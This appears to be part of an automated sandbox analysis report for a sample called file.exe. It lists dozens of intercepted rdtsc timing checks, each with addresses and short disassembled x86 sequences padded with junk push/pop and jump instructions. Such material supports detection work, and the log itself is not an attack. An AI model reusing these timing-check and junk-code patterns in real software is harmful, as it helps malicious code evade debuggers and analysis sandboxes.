                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA2525 second address: AA252B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24446 second address: B2444B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B249D3 second address: B249D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B249D9 second address: B249DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B249DD second address: B249E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24B2F second address: B24B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B24B35 second address: B24B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8517EA3h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AAAC second address: B2AAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AAB6 second address: B2AABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AABC second address: B2AAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C74306h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2AAD7 second address: B2AB0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517E9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jc 00007F33B8517EACh 0x00000010 jmp 00007F33B8517EA4h 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 jg 00007F33B8517E96h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29805 second address: B2982E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74307h 0x00000007 push esi 0x00000008 jns 00007F33B8C742F6h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2982E second address: B2984D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F33B8517EA7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2984D second address: B29868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F33B8C742F6h 0x0000000a popad 0x0000000b pushad 0x0000000c jp 00007F33B8C742F6h 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29868 second address: B2986C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2986C second address: B29872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29E4C second address: B29E73 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F33B8517EB2h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2A4CD second address: B2A4E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F33B8C742FCh 0x0000000c jo 00007F33B8C742F6h 0x00000012 push ecx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop ecx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FC96 second address: B2FC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FC9B second address: B2FCB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74301h 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FDF0 second address: B2FE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F33B8517E9Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FE05 second address: B2FE09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FF32 second address: B2FF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30209 second address: B3020F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3020F second address: B30223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F33B8517E9Bh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30223 second address: B30245 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F33B8C74305h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B303A9 second address: B303AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3053F second address: B30545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B306B0 second address: B306BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F33B8517E9Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3083A second address: B30841 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B309F6 second address: B30A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8517EA5h 0x00000009 jmp 00007F33B8517EA8h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30A28 second address: B30A3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F33B8C742FCh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30A3A second address: B30A50 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F33B8517E96h 0x00000010 jnl 00007F33B8517E96h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30D2C second address: B30D70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F33B8C74305h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F33B8C74303h 0x00000014 jmp 00007F33B8C742FBh 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b jmp 00007F33B8C74303h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34653 second address: B34657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34657 second address: B34669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F33B8C742F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34669 second address: B34677 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34677 second address: B3467B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA9AC second address: AAA9B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F33B8517E96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA9B7 second address: AAA9D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007F33B8C74302h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B33F09 second address: B33F0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3422E second address: B34234 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B34388 second address: B343A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F33B8517E9Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B36A79 second address: B36A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C74309h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CA7D second address: B3CA87 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F33B8517E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CA87 second address: B3CA8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CA8D second address: B3CA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CA91 second address: B3CA95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CBA9 second address: B3CBB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F33B8517E96h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CBB8 second address: B3CBC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F33B8C742F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CBC3 second address: B3CBD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F33B8517E96h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CBD4 second address: B3CBDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CBDA second address: B3CBDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CBDE second address: B3CC14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a jmp 00007F33B8C74302h 0x0000000f push eax 0x00000010 pop eax 0x00000011 jmp 00007F33B8C74303h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CD69 second address: B3CD74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CD74 second address: B3CD78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CEC3 second address: B3CEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnl 00007F33B8517E9Ch 0x0000000b push esi 0x0000000c jns 00007F33B8517E96h 0x00000012 js 00007F33B8517E96h 0x00000018 pop esi 0x00000019 popad 0x0000001a push ecx 0x0000001b pushad 0x0000001c push eax 0x0000001d pop eax 0x0000001e push edx 0x0000001f pop edx 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CEED second address: B3CEF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CEF6 second address: B3CEFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3D083 second address: B3D087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41FDE second address: B41FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B422DC second address: B422E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4651B second address: B46521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46521 second address: B4653B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8C74303h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4653B second address: B46541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46541 second address: B4654E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4654E second address: B46558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F33B8517E96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46558 second address: B4655C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4655C second address: B46568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45799 second address: B457A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F33B8C742F6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B457A6 second address: B457C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007F33B8517E96h 0x0000000c push esi 0x0000000d pop esi 0x0000000e jng 00007F33B8517E96h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jc 00007F33B8517E96h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B457C7 second address: B457CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45AF6 second address: B45B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c ja 00007F33B8517E96h 0x00000012 jmp 00007F33B8517E9Ch 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45B15 second address: B45B21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F33B8C742F6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45DC2 second address: B45E08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F33B8517EA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F33B8517EA2h 0x0000000f jmp 00007F33B8517E9Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007F33B8517E96h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B45E08 second address: B45E12 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F33B8C742F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4C6C4 second address: B4C6CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4C6CA second address: B4C6CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4C6CF second address: B4C6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F33B8517E96h 0x0000000a jmp 00007F33B8517E9Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4C6EA second address: B4C6FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b je 00007F33B8C742F6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4C6FD second address: B4C70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F33B8517E96h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D0BD second address: B4D0C9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F33B8C742F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D0C9 second address: B4D0CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D0CE second address: B4D0E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F33B8C742F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F33B8C742FBh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D0E8 second address: B4D10E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F33B8517EA4h 0x0000000f jno 00007F33B8517E98h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4D8E1 second address: B4D8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F33B8C742FAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DBBD second address: B4DBC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DBC1 second address: B4DBD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F33B8C742FFh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4DEE0 second address: B4DF02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F33B8517EA1h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jne 00007F33B8517E96h 0x00000012 popad 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E1A7 second address: B4E1CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F33B8C742F6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F33B8C74308h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E1CE second address: B4E1DA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F33B8517E96h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B523A3 second address: B523B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jl 00007F33B8C742F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B523B3 second address: B523B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B523B8 second address: B523C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F33B8C742F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B523C3 second address: B523C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51E08 second address: B51E18 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jl 00007F33B8C742F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B56B8C second address: B56B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5FEA5 second address: B5FEAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5FEAA second address: B5FEAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
